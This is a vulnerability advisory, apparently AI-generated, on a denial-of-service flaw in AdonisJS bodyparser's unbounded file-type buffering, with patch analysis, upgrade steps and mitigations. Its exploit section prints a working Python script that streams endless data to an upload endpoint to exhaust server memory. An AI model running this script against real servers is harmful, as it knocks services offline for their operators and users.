CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25762

Infinite Stream of Death: Crashing AdonisJS with Unbounded Buffers

Alon Barad
Alon Barad
Software Engineer

Feb 8, 2026·6 min read·34 visits

Executive Summary (TL;DR)

The AdonisJS bodyparser tries to auto-detect file types by reading the start of a file stream. Before the patch, it didn't stop reading if it couldn't find a match. Attackers can send an endless stream of garbage, causing the server to buffer it all until it crashes from memory exhaustion.

A classic but devastating Denial of Service vulnerability in the AdonisJS framework's `@adonisjs/bodyparser` package. By exploiting the multipart file parser's eagerness to identify file types (magic numbers), an attacker can stream an infinite amount of data into a memory buffer that never flushes. This results in a rapid consumption of server RAM, triggering an Out-of-Memory (OOM) crash and effectively taking down the application with a single malicious POST request.

The Hook: When "Helpful" Features Kill

Modern web frameworks are like over-eager butlers. They want to do everything for you before you even ask. In the Node.js ecosystem, AdonisJS is one of the polished ones, offering a robust structure similar to Laravel or Rails. One of its conveniences is the @adonisjs/bodyparser, a middleware responsible for chewing up incoming HTTP request bodies—JSON, forms, and the heavy lifter: multipart/form-data.

Here is the scenario: You are building a file upload feature. You want to know if the user is uploading a JPEG, a PNG, or a malicious EXE. AdonisJS, trying to be helpful, attempts to "sniff" the file stream as it comes in. It peeks at the first few bytes—the "magic numbers"—to determine the MIME type automatically.

Ideally, this only takes a few bytes (e.g., FF D8 FF for a JPEG). But what happens if the framework keeps reading, and reading, and reading, waiting for a magic number that never appears? You get CVE-2026-25762. It’s not a buffer overflow in the C sense (we aren't smashing the stack), but it is a buffer bloat that is just as deadly for availability.

The Flaw: Unbounded Optimism

The root cause lies in the PartHandler logic within the bodyparser. When a file part is detected in a multipart stream, the parser pauses the flow of data to the disk (or final destination) to buffer the initial chunk for inspection. This is necessary because you can't rewind a stream easily in Node.js without buffering.

The logic roughly went like this: "Buffer incoming data chunks until we recognize the file type." The fatal flaw? There was no MAX_BUFFER_SIZE check in that specific loop.

In a healthy request, the magic numbers appear in the first 0-4100 bytes. But in a malicious request, an attacker can send a stream that effectively looks like /dev/urandom—pure entropy or just zeros—forever. Because the parser code was thinking, "I haven't seen the file signature yet, better keep buffering so I don't miss it," it accumulates the attacker's stream into the Node.js heap. Since Node.js has a default memory limit (often 2GB or 4GB depending on flags), it doesn't take long for a single connection to eat it all.

The Code: Anatomy of a memory Leak

While the exact proprietary code isn't pasted here, we can reconstruct the vulnerability pattern based on the patch analysis. The vulnerable implementation behaves like a greedy stream consumer.

The Vulnerable Logic

// Conceptual representation of the flaw
fileStream.on('data', (chunk) => {
  // 1. Append new data to our internal buffer
  internalBuffer = Buffer.concat([internalBuffer, chunk]);
 
  // 2. Try to detect the file type
  const type = detector.fromBuffer(internalBuffer);
 
  if (type) {
    // Success! We know what it is.
    stopBufferingAndStream(internalBuffer);
  } else {
    // 3. THE BUG: We didn't find a type, so we just wait for more data.
    // If the attacker sends 10GB of data without a magic number,
    // 'internalBuffer' grows to 10GB -> OOM Crash.
    return;
  }
});

The Fix

The fix is arguably simple: stop being so optimistic. If you haven't identified the file type after looking at the first 4KB (a standard chunk size), you aren't going to find it. The patch introduces a hard limit.

// The patched logic
const MAX_SNIFF_SIZE = 4100; // Enough for almost all magic numbers
 
fileStream.on('data', (chunk) => {
  internalBuffer = Buffer.concat([internalBuffer, chunk]);
 
  const type = detector.fromBuffer(internalBuffer);
 
  // MITIGATION: Check if we've exceeded the sniffing limit
  if (!type && internalBuffer.length > MAX_SNIFF_SIZE) {
     // Stop buffering. Assume generic binary or fail.
     // This caps memory usage per request to ~4KB.
     stopBufferingAndStream(internalBuffer, 'application/octet-stream');
  }
});

By adding that length check, the memory usage for type detection goes from $O(n)$ (where $n$ is the attacker's stream size) to $O(1)$ (constant size).

The Exploit: Feeding the Beast

Exploiting this does not require advanced shellcode or heap grooming. You just need to be annoying. The goal is to keep the HTTP connection open and pour data into a single multipart field without ever sending a recognized header.

Here is how a researcher (or attacker) would script this using Python to visualize the attack vector:

import requests
import time
 
# The target endpoint handling uploads
url = 'http://localhost:3333/upload'
 
def infinite_stream():
    # Yield chunks of 'A' forever.
    # 'A' (0x41) is not a magic number for common files.
    while True:
        yield b'A' * 1024 * 1024  # 1MB chunks
        # Sleep slightly to keep connection stable but fill RAM fast
        time.sleep(0.01) 
 
files = {'file': ('payload.bin', infinite_stream())}
 
try:
    print("[*] Initiating memory exhaustion attack...")
    # This sends a multipart request where the file body never ends
    requests.post(url, files=files)
except Exception as e:
    print(f"[!] Server likely crashed: {e}")

The Result

On the server side, you will see the Node.js process resident set size (RSS) climb vertically. Within seconds (depending on bandwidth), the V8 engine will hit its allocation limit and abort with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory. The server restarts, dropping all other legitimate connections.

Impact & Remediation

The Impact

This is a high-severity Availability issue (CVSS 7.5). While it doesn't allow data theft (Confidentiality) or data tampering (Integrity), it is arguably more annoying for operations teams. A single attacker can keep a cluster of Node.js instances in a reboot loop, effectively taking the application offline.

The Mitigation

If you are using @adonisjs/bodyparser, you need to upgrade immediately. The fix was backported to multiple versions.

  1. Check your version:
    npm list @adonisjs/bodyparser
  2. Upgrade:
    • If you are on v10: Upgrade to 10.1.3 or later.
    • If you are on v11 (beta/next): Upgrade to 11.0.0-next.9 or later.

Defense in Depth

Beyond the patch, never trust application-layer parsers blindly. Place a reverse proxy like Nginx in front of your Node.js apps. Configure client_max_body_size in Nginx. While this specific CVE exploits the buffering (meaning a small valid body could still trigger it if sent weirdly, though usually, this requires size), a hard limit on request body size is a mandatory first line of defense.

Official Patches

AdonisJSRelease v10.1.3 fixing the issue
AdonisJSRelease v11.0.0-next.9 fixing the issue

Technical Appendix

CVSS Score
7.5/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Probability
0.01%
Top 98% most exploited

Affected Systems

AdonisJS Framework@adonisjs/bodyparser middleware

Affected Versions Detail

Product
Affected Versions
Fixed Version
@adonisjs/bodyparser
AdonisJS
< 10.1.310.1.3
@adonisjs/bodyparser
AdonisJS
< 11.0.0-next.911.0.0-next.9
AttributeDetail
CWE IDCWE-400 (Uncontrolled Resource Consumption)
CVSS7.5 (High)
Attack VectorNetwork (Remote)
Availability ImpactHigh (Service Crash)
Exploit StatusTrivial / PoC reproducible
EPSS Score0.00012 (Low probability of mass exploitation)

MITRE ATT&CK Mapping

T1499.003Endpoint Denial of Service: Application or System Exploitation
Impact
CWE-400
Uncontrolled Resource Consumption

The software does not properly restrict the size or amount of resources that are requested or influenced by an actor, which can be used to consume all available resources.

Known Exploits & Detection

HypotheticalStandard infinite HTTP body streaming attack using Python requests or curl.

Vulnerability Timeline

Vulnerability Published
2026-02-06
Patched Version Released
2026-02-06

References & Sources

  • [1]GHSA-xx9g-fh25-4q64 Advisory
  • [2]NVD CVE-2026-25762

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•7 days ago•CVE-2026-9354
6.9

CVE-2026-9354: Arbitrary Mass Mention Bypass in NousResearch hermes-agent Slack and Mattermost Adapters

A vulnerability in the Slack and Mattermost platform adapters for NousResearch hermes-agent permits an unauthenticated remote attacker to execute arbitrary mass mentions. By leveraging prompt injection, an attacker can bypass output sanitization logic and trigger workspace-wide notification exhaustion.

Alon Barad
Alon Barad
35 views•6 min read
•7 days ago•CVE-2026-9306
6.3

CVE-2026-9306: Unauthenticated Insecure Direct Object Reference (IDOR) in QuantumNous new-api Midjourney Relay

CVE-2026-9306 is a critical unauthenticated Insecure Direct Object Reference (IDOR) vulnerability located in the QuantumNous new-api application, affecting versions up to and including 0.12.1. The flaw is caused by improper middleware ordering combined with a lack of object-level authorization checks. This allows remote, unauthenticated attackers to retrieve sensitive Midjourney images belonging to other users by supplying a valid task identifier.

Amit Schendel
Amit Schendel
13 views•5 min read
•8 days ago•GHSA-GGXF-37HM-9WQF
6.5

GHSA-GGXF-37HM-9WQF: Session Leakage via Unsafe Challenge Path Parsing in instagrapi

The instagrapi library prior to version 2.6.9 contains an improper input validation vulnerability within its challenge handling mechanism. Maliciously crafted server responses can manipulate the client into forwarding session cookies and credentials to an external attacker-controlled domain.

Amit Schendel
Amit Schendel
21 views•6 min read
•8 days ago•GHSA-QQQM-5547-774X
9.1

GHSA-QQQM-5547-774X: Unauthenticated Path Traversal in FileBrowser Quantum PATCH Handler

GHSA-QQQM-5547-774X is a critical path traversal vulnerability in the FileBrowser Quantum application, specifically within the Go backend package. The vulnerability resides in the HTTP handler responsible for processing bulk file modifications via the public API. Unauthenticated attackers can exploit an order-of-operations flaw in the path sanitization logic to bypass intended directory restrictions. This allows adversaries to arbitrarily read, move, and overwrite files on the underlying filesystem by supplying specially crafted HTTP PATCH requests.

Alon Barad
Alon Barad
9 views•6 min read
•8 days ago•CVE-2026-8723
5.3

CVE-2026-8723: Synchronous Denial of Service in qs npm Package via TypeError

The qs query string parsing and serialization library for Node.js is vulnerable to a synchronous Denial of Service (DoS) attack. The vulnerability manifests as a process-terminating TypeError when processing arrays with null or undefined elements under specific configuration parameters.

Amit Schendel
Amit Schendel
37 views•7 min read
•8 days ago•GHSA-7M8F-HGJQ-8GC9
7.5

GHSA-7M8F-HGJQ-8GC9: Pre-Authentication Denial of Service via Insecure Deserialization Order in aiosend

The aiosend library prior to version 3.0.6 contains a pre-authentication Denial of Service (DoS) vulnerability in its webhook handling mechanism. The software processes and deserializes incoming JSON payloads before verifying the cryptographic signature, allowing unauthenticated attackers to exhaust server CPU and memory resources by sending large, complex payloads.

Amit Schendel
Amit Schendel
4 views•6 min read